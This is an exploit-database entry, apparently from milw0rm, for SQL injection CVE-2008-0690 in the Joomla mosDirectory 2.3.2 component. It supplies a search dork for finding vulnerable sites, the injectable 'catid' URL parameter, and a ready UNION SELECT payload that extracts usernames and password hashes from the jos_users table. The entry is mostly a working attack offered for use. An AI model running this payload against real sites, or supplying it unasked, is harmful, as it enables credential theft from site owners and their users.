[] NeoSense

Joomla! Component mosDirectory 2.3.2 - 'catid' SQL Injection

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-02-02 
date_updated: 2016-11-09 
verified: 1 
codes: OSVDB-41513;CVE-2008-0690 
tags: 
aliases:  
screenshot_url:  
application_url: 

###########################################################################################
### Joomla Component mosDirectory 2.3.2 (catid) Remote SQL Injection Vulnerability      ###
### Script :  :(                                                                          ###
### Dork : inurl:index.php?option=com_directory                                         ###
### Injection Adress : /index.php?option=com_directory&page=viewcat&catid=[SQL Code]    ###
### SQL Code :                                                                          ###
###   -1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*  ###
###                                     aNa TrYaGi                                      ###
###########################################################################################

# milw0rm.com [2008-02-03]